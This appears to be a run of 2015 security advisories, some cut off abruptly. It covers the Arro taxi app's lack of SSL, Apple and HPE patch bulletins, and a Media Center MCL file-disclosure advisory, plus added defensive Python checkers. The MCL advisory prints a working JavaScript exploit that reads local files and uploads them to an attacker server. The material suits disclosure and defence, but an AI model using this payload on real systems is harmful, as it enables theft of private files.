Original: http://securityresearch.shaftek.biz/2015/12/goarro-and-other-taxi-hailing-apps-did-not-use-ssl.html
CERT Advisory: https://www.kb.cert.org/vuls/id/439016

Advisory: Arro and Other Android Taxi Hailing Apps Did Not Use SSL (Mobile Knowledge)

Overview

Arro and possibly over 100 other Android taxi hailing apps did not use SSL to secure communications between the application and its servers.

Background

Arro is a taxi hailing service allowing users to hail yellow taxis in New York from their smartphones. The service also allows users to pay for their ride via the application while they are in a taxi. The underlying technology is a white branded version of an application called Taxi Hail, made by a company called Mobile Knowledge, in Ottawa, Canada, a subsidiary of Creative Mobile Technologies, LLC (CMT) of New York, NY. Both are providers of technology solutions for the taxi industry. At least 100 other white branded taxi applications run on the same platform as Arro, with a link to a non-exhaustive list appearing later in this document.

Details

While monitoring network traffic from an Android smartphone, we observed that most communications between the Arro Android application and its servers were unencrypted and did not use SSL. Instead, regular HTTP calls were being used. Further investigation showed that the underlying application and servers were a white branded version of TaxiHail, developed by Mobile Knowledge.

Information observed included:
- Username and passwords for the users of the application
- User profile including address and phone number
- Credentials for various APIs and payment gateways used by the application
- Latitude and longitude of the user requesting a taxi
- Last four digits and expiration date of the user's credit cards on file
- When adding a new credit card: full credit card information

Payments were made via a separate gateway that uses SSL and were not at risk. However, adding credit cards was done without SSL.

A secondary minor issue was also discovered. The GoArro app created a text log on the SD card of the device being tested. This log, located at "/TaxiHail/errorlog.txt", contained GPS locations for the user, which would be accessible to applications on the same phone without location access. This issue has also been fixed.

References

Arro website: https://www.goarro.com/
CERT/CC ID: VU# 439016
CMT website: http://creativemobiletech.com/
List of white branded apps: https://play.google.com/store/search?q=com.apcurium.MK&c=apps&hl=en
TaxiHail website: http://www.mobile-knowledge.com/products/passenger-solutions/taxihail/

Credits

Thank you to Garret Wasserman of CERT/CC for helping to communicate with the vendors.

Timeline

2015-10-14: Arro notified
2015-10-14: Initial vendor response
2015-10-15: Followup communications to Arro, no response
2015-10-20: CERT/CC notified
2015-10-23: CERT/CC response
2015-11-06: Mobile Knowledge acknowledged the problem via CERT/CC
2015-11-30: Fix deployed by vendor
2015-12-01: Fix confirmed
2015-12-08: Public disclosure, coordinated with CERT/CC

Version Information

Version 3
Last updated on 2015-12-07
APPLE-SA-2015-12-08-1 iOS 9.2
iOS 9.2 is now available and addresses the following:

AppleMobileFileIntegrity
Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary code with system privileges
Description: An access control issue was addressed by preventing modification of access control structures.
CVE-ID
CVE-2015-7055 : Apple

AppSandbox
Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may maintain access to Contacts after having access revoked
Description: An issue existed in the sandbox's handling of hard links. This issue was addressed through improved hardening of the app sandbox.
CVE-ID
CVE-2015-7001 : Razvan Deaconescu and Mihai Bucicoiu of University POLITEHNICA of Bucharest; Luke Deshotels and William Enck of North Carolina State University; Lucas Vincenzo Davi and Ahmad-Reza Sadeghi of TU Darmstadt

CFNetwork HTTPProtocol
Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker with a privileged network position may be able to bypass HSTS
Description: An input validation issue existed within URL processing. This issue was addressed through improved URL validation.
CVE-ID
CVE-2015-7094 : Tsubasa Iinuma (@llamakko_cafe) of Gehirn Inc. and Muneaki Nishimura (nishimunea)

Compression
Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to arbitrary code execution
Description: An uninitialized memory access issue existed in zlib. This issue was addressed through improved memory initialization and additional validation of zlib streams.
CVE-ID
CVE-2015-7054 : j00ru

CoreGraphics
Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: Processing a maliciously crafted font file may lead to arbitrary code execution
Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation.
CVE-ID
CVE-2015-7105 : John Villamil (@day6reak), Yahoo Pentest Team

CoreMedia Playback
Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to arbitrary code execution
Description: Multiple memory corruption issues existed in the processing of malformed media files. These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-7074 : Apple
CVE-2015-7075

dyld
Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary code with system privileges
Description: Multiple segment validation issues existed in dyld. These were addressed through improved environment sanitization.
CVE-ID
CVE-2015-7072 : Apple
CVE-2015-7079 : PanguTeam

GPUTools Framework
Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary code with system privileges
Description: Multiple path validation issues existed in Mobile Replayer. These were addressed through improved environment sanitization.
CVE-ID
CVE-2015-7069 : Luca Todesco (@qwertyoruiop)
CVE-2015-7070 : Luca Todesco (@qwertyoruiop)

iBooks
Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: Parsing a maliciously crafted iBooks file may lead to disclosure of user information
Description: An XML external entity reference issue existed with iBook parsing. This issue was addressed through improved parsing.
CVE-ID
CVE-2015-7081 : Behrouz Sadeghipour (@Nahamsec) and Patrik Fehrenbach (@ITSecurityguard)

ImageIO
Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: Processing a maliciously crafted image may lead to arbitrary code execution
Description: A memory corruption issue existed in ImageIO. This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-7053 : Apple

IOHIDFamily
Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary code with system privileges
Description: Multiple memory corruption issues existed in IOHIDFamily API. These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-7111 : beist and ABH of BoB
CVE-2015-7112 : Ian Beer of Google Project Zero

IOKit SCSI
Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary code with kernel privileges
Description: A null pointer dereference existed in the handling of a certain userclient type.
[CORE-2015-0014] - Microsoft Windows Media Center link file incorrectly resolved reference
1. Advisory Information
Title: Microsoft Windows Media Center link file incorrectly resolved reference
Advisory ID: CORE-2015-0014
Advisory URL: http://www.coresecurity.com/advisories/microsoft-windows-media-center-link-file-incorrectly-resolved-reference
Date published: 2015-12-08
Date of last update: 2015-12-04
Vendors contacted: Microsoft
Release mode: Coordinated release

2. Vulnerability Information
Class: Use of Incorrectly-Resolved Name or Reference [CWE-706]
Impact: Information leak
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2015-6127

3. Vulnerability Description
The 'application' tag in Microsoft [1] Windows Media Center link files (.mcl extension) can include a 'run' parameter, which indicates the path of a file to be launched when opening the MCL file, or a 'url' parameter, which indicates the URL of a web page to be loaded within the Media Center's embedded web browser. A specially crafted MCL file whose 'url' parameter points to the MCL file itself can trick Windows Media Center into rendering that very MCL file as a local HTML file within the Media Center's embedded web browser.

4. Vulnerable Packages
Windows 7 for x64-based Systems Service Pack 1 (with Internet Explorer 11 installed)
Other versions are probably affected too, but they were not checked.

5. Vendor Information, Solutions and Workarounds
Microsoft posted the following Security Bulletin: MS15-134 [2]

6. Credits
This vulnerability was discovered and researched by Francisco Falcon from Core Exploits Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from the Core Advisories Team.

7. Technical Description / Proof of Concept Code
The ehexthost.exe binary, part of Windows Media Center, loads the given URL into an embedded instance of Internet Explorer running in the Local Machine zone, but it does not opt in to the FEATURE_LOCALMACHINE_LOCKDOWN IE security feature. An attacker can therefore read and exfiltrate arbitrary files from a victim's local filesystem by convincing them to open a malicious MCL file.

The proof of concept is an MCL file with embedded HTML + JS code that references itself in the 'url' parameter. Unlike what happens when a local HTML file is loaded into Internet Explorer 11, the JS code included here runs automatically with no prompts, and it is able to read arbitrary local files using the MSXML2.XMLHTTP ActiveX object. The files read this way can then be uploaded to an arbitrary remote web server. Also note that, for the PoC to work, the value of the 'url' parameter must match the name of the MCL file.

7.1. Proof of Concept
A new file should be created with the name "poc-microsoft.mcl" and with the following content:

function do_upload(fname, data){
    /* Send the file contents to the attacker's server (192.168.1.50 is the
       PoC's own listener); the upload itself is an ordinary cross-origin
       XMLHttpRequest, which is allowed from the Local Machine zone. */
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.open("POST", "http://192.168.1.50/uploadfile.php", true);
    xmlhttp.setRequestHeader("Content-type", "multipart/form-data");
    xmlhttp.setRequestHeader("Connection", "close");
    xmlhttp.onreadystatechange = function(){
        if (xmlhttp.readyState == 4){
            alert(fname + " done.");
        }
    }
    xmlhttp.send(new Uint8Array(data));
}

function read_local_file(filename){
    /* Must use this one, XMLHttpRequest() doesn't allow to read local files.
       The ActiveX object is reachable because the page runs in the Local
       Machine zone without FEATURE_LOCALMACHINE_LOCKDOWN. */
    var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
    xmlhttp.open("GET", filename, false);
    xmlhttp.send();
    return xmlhttp.responseBody.toArray();
}

function upload_file(filename){
    try{
        do_upload(filename, read_local_file(filename));
    }catch(e){
        alert(filename + " error: " + e);
    }
}

/* Any local path works; calc.exe is just a file that exists on every target. */
upload_file("file:///C:/Windows/System32/calc.exe");

8. Report Timeline
2015-09-24: Core Security sent the first notification to Microsoft.
2015-09-24: Microsoft acknowledged receipt of the email and requested a draft version of the advisory.
2015-09-25: Core Security sent Microsoft the draft version of the advisory including a PoC.
2015-09-25: Microsoft cased the report under MSRC 31305.
2015-10-02: Core Security requested Microsoft provide a status update and confirmation of the reported bug.
2015-10-02: Microsoft informed Core Security that they were able to reproduce the issue. They were still reviewing it to determine if they would address it in a security release.
2015-10-07: Core Security requested Microsoft let us know once they made a decision.
2015-10-08: Microsoft informed Core Security they would keep us updated.
2015-10-26: Core Security asked Microsoft if there were any updates regarding the reported bug and if they had an estimated time of availability.
2015-10-27: Microsoft informed Core Security that they would be pursuing a fix for the reported issue and are working on a release date for it.
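The following Python scanner is an added example and is not part of the Core Security advisory. It turns the advisory's observations into a triage check for .mcl files: a 'url' parameter of the 'application' tag that points back at the MCL file's own name is the CVE-2015-6127 trigger, and a 'run' parameter or embedded script content is worth surfacing on its own. The sample MCL contents are constructed, and any attribute of the 'application' tag other than 'run' and 'url' is an assumption, since those two are the only parameters the advisory documents.

```python
import os
import re

# Constructed sample .mcl contents (assumptions; not the advisory's PoC).
# The advisory documents only the 'application' tag's 'run' and 'url'
# parameters; any other attribute shown here is illustrative.
SAMPLES = {
    "benign.mcl": '<application title="Demo" url="http://example.invalid/app/" />',
    "poc-microsoft.mcl": (
        '<application title="x" url="poc-microsoft.mcl">'
        '<html><body><script>alert(1)</script></body></html>'
        '</application>'
    ),
    "local-run.mcl": '<application title="x" run="C:\\Windows\\System32\\calc.exe" />',
}

APP_TAG_RE = re.compile(r"<application\b([^>]*)>", re.I)
ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"')
SCRIPT_RE = re.compile(r"<script\b", re.I)
HTTP_RE = re.compile(r"^https?://", re.I)


def application_params(content):
    """Return the attributes of the first <application> tag, keys lower-cased."""
    match = APP_TAG_RE.search(content)
    if not match:
        return {}
    return {k.lower(): v for k, v in ATTR_RE.findall(match.group(1))}


def scan_mcl(filename, content):
    """Return a list of findings for one MCL file; an empty list means nothing notable."""
    findings = []
    params = application_params(content)
    url = params.get("url", "")
    if url:
        # Self-reference is the CVE-2015-6127 trigger: Media Center renders the
        # MCL file itself as local HTML inside the embedded browser.
        target = os.path.basename(url.replace("\\", "/")).lower()
        if target == os.path.basename(filename).lower():
            findings.append("url parameter references the MCL file itself")
        elif not HTTP_RE.match(url):
            findings.append("url parameter is not an http(s) URL: " + url)
    if "run" in params:
        # 'run' is a documented feature, but a local launch target is what a
        # reviewer wants to see before the file is opened.
        findings.append("run parameter launches a local program: " + params["run"])
    if SCRIPT_RE.search(content):
        findings.append("MCL file carries embedded <script> content")
    return findings


def scan_all(samples):
    """Scan a {filename: content} mapping and return {filename: findings}."""
    return {name: scan_mcl(name, body) for name, body in samples.items()}


if __name__ == "__main__":
    for name, found in scan_all(SAMPLES).items():
        print(name, "->", found or "clean")
```

The self-reference test compares base names only, because the advisory states that the 'url' value has to match the MCL file's name; a URL that resolves to some other local file is reported separately so it is not lost.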
APPLE-SA-2015-12-08-2 tvOS 9.1
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 APPLE-SA-2015-12-08-2 tvOS 9.1 tvOS 9.1 is now available and addresses the following: AppleMobileFileIntegrity Available for: Apple TV (4th generation) Impact: A malicious application may be able to execute arbitrary code with system privileges Description: An access control issue was addressed by preventing modification of access control structures. CVE-ID CVE-2015-7055 : Apple AppSandbox Available for: Apple TV (4th generation) Impact: A malicious application may maintain access to Contacts after having access revoked Description: An issue existed in the sandbox's handling of hard links. This issue was addressed through improved hardening of the app sandbox. CVE-ID CVE-2015-7001 : Razvan Deaconescu and Mihai Bucicoiu of University POLITEHNICA of Bucharest; Luke Deshotels and William Enck of North Carolina State University; Lucas Vincenzo Davi and Ahmad-Reza Sadeghi of TU Darmstadt Compression Available for: Apple TV (4th generation) Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: An uninitialized memory access issue existed in zlib. This issue was addressed through improved memory initialization and additional validation of zlib streams. CVE-ID CVE-2015-7054 : j00ru Configuration Profiles Available for: Apple TV (4th generation) Impact: A local attacker may be able to install a configuration profile without admin privileges Description: An issue existed when installing configuration profiles. This issue was addressed through improved authorization checks. CVE-ID CVE-2015-7062 : David Mulder of Dell Software CoreGraphics Available for: Apple TV (4th generation) Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. 
CVE-ID CVE-2015-7105 : John Villamil (@day6reak), Yahoo Pentest Team CoreMedia Playback Available for: Apple TV (4th generation) Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the processing of malformed media files. These issues were addressed through improved memory handling. CVE-ID CVE-2015-7074 CVE-2015-7075 : Apple Disk Images Available for: Apple TV (4th generation) Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the parsing of disk images. This issue was addressed through improved memory handling. CVE-ID CVE-2015-7110 : Ian Beer of Google Project Zero dyld Available for: Apple TV (4th generation) Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Multiple segment validation issues existed in dyld. These were addressed through improved environment sanitization. CVE-ID CVE-2015-7072 : Apple CVE-2015-7079 : PanguTeam ImageIO Available for: Apple TV (4th generation) Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: A memory corruption issue existed in ImageIO. This issue was addressed through improved memory handling. CVE-ID CVE-2015-7053 : Apple IOAcceleratorFamily Available for: Apple TV (4th generation) Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in IOAcceleratorFamily. This issue was addressed through improved memory handling. CVE-ID CVE-2015-7109 : Juwei Lin of TrendMicro IOHIDFamily Available for: Apple TV (4th generation) Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Multiple memory corruption issues existed in IOHIDFamily API. These issues were addressed through improved memory handling. 
CVE-ID CVE-2015-7111 : beist and ABH of BoB CVE-2015-7112 : Ian Beer of Google Project Zero IOKit SCSI Available for: Apple TV (4th generation) Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference existed in the handling of a certain userclient type. This issue was addressed through improved validation. CVE-ID CVE-2015-7068 : Ian Beer of Google Project Zero Kernel Available for: Apple TV (4th generation) Impact: A local application may be able to cause a denial of service Description: Multiple denial of service issues were addressed through improved memory handling. CVE-ID CVE-2015-7040 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2015-7041 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2015-7042 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2015-7043 : Tarjei Mandt (@kernelpool) Kernel Available for: Apple TV (4th generation) Impact: A local user may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues existed in the kernel. These
[security bulletin] HPSBHF03432 rev.1 - HPE Networking Comware 5, Comware 5 Low Encryption SW, Comware 7, VCX Using NTP, Remote Access Restriction Bypass and Code Execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1

Note: the current version of the following document is available here: https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04916783

SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04916783
Version: 1
HPSBHF03432 rev.1 - HPE Networking Comware 5, Comware 5 Low Encryption SW, Comware 7, VCX Using NTP, Remote Access Restriction Bypass and Code Execution
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2015-12-09
Last Updated: 2015-12-09
Potential Security Impact: Remote Access Restriction Bypass, Code Execution
Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HPE Networking Comware 5, Comware 5 Low Encryption SW, Comware 7, and VCX using NTP. The vulnerabilities could be remotely exploited, resulting in remote access restriction bypass and code execution.

References: SSRT101878, CVE-2014-9293, CVE-2014-9294, CVE-2014-9295

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
See the RESOLUTION section for a list of impacted hardware and Comware 5, Comware 5 Low Encryption SW, Comware 7, and VCX versions.

BACKGROUND
CVSS 2.0 Base Metrics
===
Reference        Base Vector                    Base Score
CVE-2014-9293    (AV:N/AC:L/Au:N/C:P/I:P/A:P)   7.5
CVE-2014-9294    (AV:N/AC:L/Au:N/C:P/I:P/A:P)   7.5
CVE-2014-9295    (AV:N/AC:L/Au:N/C:P/I:P/A:P)   7.5
===
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION
Hewlett Packard Enterprise has provided updated Comware 5, Comware 5 Low Encryption SW, Comware 7 and VCX to address this on impacted Hewlett Packard Enterprise products.
Family: 8800 (Comware 5)
Fixed Version: R3627P04
HP Branded Products Impacted: JC137A HP 8805/8808/8812 (2E) Main Control Unit Module, JC138A HP 8805/8808/8812 (1E) Main Control Unit Module, JC141A HP 8802 Main Control Unit Module, JC147A HP 8802 Router Chassis, JC147B HP 8802 Router Chassis, JC148A HP 8805 Router Chassis, JC148B HP 8805 Router Chassis, JC149A HP 8808 Router Chassis, JC149B HP 8808 Router Chassis, JC150A HP 8812 Router Chassis, JC150B HP 8812 Router Chassis, JC596A HP 8800 Dual Fabric Main Processing Unit, JC597A HP 8800 Single Fabric Main Processing Unit
CVE #: CVE-2014-9295

Family: A6600 (Comware 5)
Fixed Version: R3303P18
HP Branded Products Impacted: JC165A HP 6600 RPE-X1 Router Module, JC177A HP 6608 Router, JC177B HP 6608 Router Chassis, JC178A HP 6604 Router Chassis, JC178B HP 6604 Router Chassis, JC496A HP 6616 Router Chassis, JC566A HP 6600 RSE-X1 Router Main Processing Unit, JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit, JG781A HP 6600 RPE-X1 TAA-compliant Main Processing Unit
CVE #: CVE-2014-9295

Family: HSR6602 (Comware 5)
Fixed Version: R3303P18
HP Branded Products Impacted: JC176A HP 6602 Router Chassis, JG353A HP HSR6602-G Router, JG354A HP HSR6602-XG Router, JG355A HP 6600 MCP-X1 Router Main Processing Unit, JG356A HP 6600 MCP-X2 Router Main Processing Unit, JG776A HP HSR6602-G TAA-compliant Router, JG777A HP HSR6602-XG TAA-compliant Router, JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit
CVE #: CVE-2014-9295

Family: HSR6800 (Comware 5)
Fixed Version: R3303P18
HP Branded Products Impacted: JG361A HP HSR6802 Router Chassis, JG362A HP HSR6804 Router Chassis, JG363A HP HSR6808 Router Chassis, JG364A HP HSR6800 RSE-X2 Router Main Processing Unit, JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit
CVE #: CVE-2014-9295

Family: MSR20 (Comware 5)
Fixed Version: R2513P45
HP Branded Products Impacted: JD432A HP A-MSR20-21 Router, JD662A HP MSR20-20 Router, JD663A HP A-MSR20-21 Router, JD663B HP MSR20-21 Router, JD664A HP MSR20-40 Router, JF228A HP MSR20-40 Router, JF283A HP MSR20-20 Router
CVE #: CVE-2014-9295

Family: MSR20-1X (Comware 5)
Fixed Version: R2513P45
HP Branded Products Impacted: JD431A HP MSR20-10 Router, JD667A HP MSR20-15 IW Multi-Service Router, JD668A HP MSR20-13 Multi-Service Router, JD669A HP MSR20-13 W Multi-Service Router, JD670A HP MSR20-15 A Multi-Service Router, JD671A HP MSR20-15 AW Multi-Service Router, JD672A HP MSR20-15 I Multi-Service Router, JD673A HP MSR20-11 Multi-Service Router, JD674A HP MSR20-12 Multi-Service Router, JD675A HP MSR20-12 W Multi-Service Router, JD676A HP MSR20-12 T1 Multi-Service Router, JF236A HP MSR20-15-I Router, JF237A HP MSR20-15-A Router, JF238A HP MSR20-15-I-W Router, JF239A HP MSR20-11 Router, JF240A HP MSR20-13 Router, JF241A HP MSR20-12 Router, JF806A HP MSR20-12-T Router, JF807A HP MSR20-12-W Router, JF808A HP MSR20-13-W Router, JF809A HP MSR20-15-A-W Router, JF817A HP MSR20-15 Router, JG209A HP MSR20-12-T-W Router (NA), JG210A HP MSR20-13-W Router (NA)
H3C Branded Products Impacted: H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1, H3C RT-MSR2015-AC-OVS-AW-H3 (0235A393), H3C RT-MSR2015-AC-OVS-I-H3 (0235A394), H3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V), H3C MSR 20-11 (0235A31V), H3C MSR 20-12 (0235A32E), H3C MSR 20-12 T1 (0235A32B),
APPLE-SA-2015-12-08-5 Safari 9.0.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512

APPLE-SA-2015-12-08-5 Safari 9.0.2

Safari 9.0.2 is now available and addresses the following:

WebKit
Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, OS X El Capitan v10.11 and v10.11.1
Impact: Visiting a maliciously crafted website may lead to arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit. These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-7048 : Apple
CVE-2015-7095 : Apple
CVE-2015-7096 : Apple
CVE-2015-7097 : Apple
CVE-2015-7098 : Apple
CVE-2015-7099 : Apple
CVE-2015-7100 : Apple
CVE-2015-7101 : Apple
CVE-2015-7102 : Apple
CVE-2015-7103 : Apple
CVE-2015-7104 : Apple

WebKit
Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, OS X El Capitan v10.11 and v10.11.1
Impact: Visiting a maliciously crafted website may reveal a user's browsing history
Description: An insufficient input validation issue existed in content blocking. This issue was addressed through improved content extension parsing.
CVE-ID
CVE-2015-7050 : Luke Li and Jonathan Metzman

Installation note: Safari 9.0.2 may be obtained from the Mac App Store.
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- Comment: GPGTools - https://gpgtools.org iQIcBAEBCgAGBQJWZzRXAAoJEBcWfLTuOo7tp/kP/1QG495DAo4BKcJwr5oHxeK+ V0cld44Ot1F9+m8Pd2Il5kkE2mxEGnvOdtEQM0mOT80qfdTVi9zD4ypnFWkBcob1 tV0hEa7/LxMe1OtDMeeNM+qW22Ap6RO8o7v6mCzdn72ds0xSmiPFGuQ1RiRflKRj MjU+k61a3oEe2/rkvbBfuDSIm+4yZo1PjTDI02UoD5JC2nJ0Dlk6978hF6lLSrCv 28UR0i6NijI3Wa2Uq3gSA+qY9bo02sC1XOEveTfftLUfl1QOID0VZGHHnrao4mfx LpxYJR2XJpTvNs1x3lCOcTYWJr4Ju99/ZFkHneAj2OQEvOhP/CHuqUmUglHW9UMW CwQKAVZD242e6qPUu0xaW/nH4dQHbridWPWR3MfwiFj6Vbzc3Wpc+tx7LGdlFuhG 9/goo4MMI7QFdxFXD3bbcOhYRi6DbqJUSxTvWfpC2sssFmZ/N5kmr0w2ccXMUAGc Ez2M8Wm+gVYlCeBMS3rtPkxVcayzHZnxhj+3Fa7Qh3FAY9NdnJ/UA6xJdPrQvTpd DJsQUIK9Ung2c1D3kGGN6QgnUCgL3CtZ7RCSgPD8Zqs4q6Zhuwq6uquC3EDIZO2y HgMF1dRKihaXV5URz9IXfQAHQvbR1PD5e/KuL32bEtXwE0Oxocp1jTrIeIrW71JZ 2qcwUzBx5TzaQfLl+Rk1 =7iMd -END PGP SIGNATURE-
[security bulletin] HPSBHF03433 SSRT102964 rev.1 - HP-UX Running Mozilla Firefox and Thunderbird, Remote Disclosure of Information
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1

Note: the current version of the following document is available here: https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04918839

SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04918839
Version: 1
HPSBHF03433 SSRT102964 rev.1 - HP-UX Running Mozilla Firefox and Thunderbird, Remote Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2015-12-09
Last Updated: 2015-12-09
Potential Security Impact: Remote Disclosure of Information
Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP-UX running Mozilla Firefox and Thunderbird. This may allow remote disclosure of information.
Note: This is the TLS vulnerability known as "Logjam", in which a Diffie-Hellman key exchange can be downgraded to US export-grade 512-bit parameters; it could be exploited remotely, resulting in disclosure of information.

References: CVE-2015-4000, PSRT102964

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX Thunderbird v2.0.0.24
HP-UX Firefox browser v3.5.09.00

BACKGROUND
CVSS 2.0 Base Metrics
===
Reference        Base Vector                    Base Score
CVE-2015-4000    (AV:N/AC:M/Au:N/C:N/I:P/A:N)   4.3
===
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION
HP has provided the following configuration instructions to resolve this vulnerability. Do the following to mitigate the Logjam issue in HP-UX Firefox and Thunderbird:

HP-UX Firefox browser:
Visit about:config in the Firefox browser.
Search for ssl3 and disable the DHE_RSA ciphers by setting the following preferences to false:
security.ssl3.dhe_rsa_aes_128_sha
security.ssl3.dhe_rsa_aes_256_sha
Restart the browser.

HP-UX Thunderbird:
Select "Preferences" from the "Edit" menu.
Select the "Advanced" tab and then click the "Config Editor" button.
Search for security.ssl3.dhe_rsa_aes and disable the DHE_RSA ciphers by setting the following preferences to false:
security.ssl3.dhe_rsa_aes_128_sha
security.ssl3.dhe_rsa_aes_256_sha

HISTORY
Version:1 (rev.1) - 9 December 2015 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact the normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hpe.com.

Report: To report a potential security vulnerability with any HPE supported product, send Email to: security-al...@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2015 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind.
To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQEcBAEBAgAGBQJWaKP3AAoJEGIGBBYqRO9/QcEIAMOIYJMgHo5zM75Q0egT3yHs xEJL1VDjeGlijoYLlM32UihFjqP2x2af2Snx03xHpF01/FEQdup8KRHs4F320QYH qK3ruL9An4Urg6jNjv2J+1lOPYdHzwvKIpYMXBpMoPlHogOgSaB9g9h4mrp4FEDl StS7MvvLRok/2/kDWtETI8kGJExj0Jxfb0sIQ9Fv6ext3qYTZiexUwpll9GCFEeV ZfgC9zA2Gh5Hsyj+Docs5ReDgfDPUDV9NpQAVhsqS1fuAl+FTetrFvypUQPdHR0F wMLiorlK9Y3A+IJs/PpTe1cgrRoDbHS1buZYUCFjAMXDPo4BU0XVmQmFsU/suuY= =qla+ -END PGP SIGNATURE-
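The HPE bulletin above describes the Logjam workaround as two preferences to flip by hand. As an added example that is not part of the bulletin, the Python check below reads a Firefox or Thunderbird prefs.js, reports which of those two DHE preferences are still enabled, and emits the user.js lines that would switch them off, so the state can be verified across a fleet rather than eyeballed in about:config. The sample prefs.js is constructed, and treating a preference that is absent from prefs.js as enabled is an assumption about the build default (the affected releases ship the DHE suites on). One caveat worth knowing: these two preferences switch off the DHE_RSA AES suites altogether, not only export-grade variants, since the client has no separate preference for export DHE; ECDHE suites are unaffected.

```python
import re

# Constructed sample prefs.js (an assumption, not from the bulletin): one of
# the two DHE preferences has been set to false, the other is left at default.
SAMPLE_PREFS_JS = """\
# Mozilla User Preferences
user_pref("security.ssl3.dhe_rsa_aes_256_sha", false);
user_pref("security.ssl3.rsa_aes_128_sha", true);
user_pref("network.cookie.cookieBehavior", 0);
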